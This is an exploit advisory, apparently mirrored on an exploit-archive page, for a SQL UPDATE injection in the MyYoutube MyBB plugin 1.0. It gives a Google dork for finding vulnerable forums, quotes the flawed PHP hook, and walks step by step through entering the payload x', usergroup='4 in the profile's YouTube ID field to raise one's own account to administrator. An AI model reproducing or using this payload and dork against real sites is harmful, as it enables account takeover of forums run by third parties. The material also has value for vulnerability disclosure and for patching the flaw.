扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection. # Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of" # Date: 12.10.2012 # Exploit Author: Zixem # Vendor Homepage: http://www.mybb-es.com # Software Link: http://mods.mybb.com/view/myyoutube # Version: 1.0 # Tested on: Linux. MyYoutube plugin suffers from POST SQL UPDATE injection. The vulnerabillity exist within youtube.php : <?php $plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/ function youtube_update($ytb) /*Line 128*/ { global $mybb; if(isset($mybb->input['ytb'])) { $ytb->user_update_data['ytb'] = $mybb->input['ytb']; } } ?> Insturctions: (1) Go to usercp.php?action=profile (2) http://i.imgur.com/gPYdq.png Enter this in the youtube ID field(just like in the picture): x', usergroup='4 (3) Press on the update button. (4) You're an admin now :3 If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4. PoC: before: http://i.imgur.com/aPFsz.png While exploiting: http://i.imgur.com/gPYdq.png Result: http://i.imgur.com/4ezpF.png http://twitter.com/z1xem -Zixem |
体验盒子
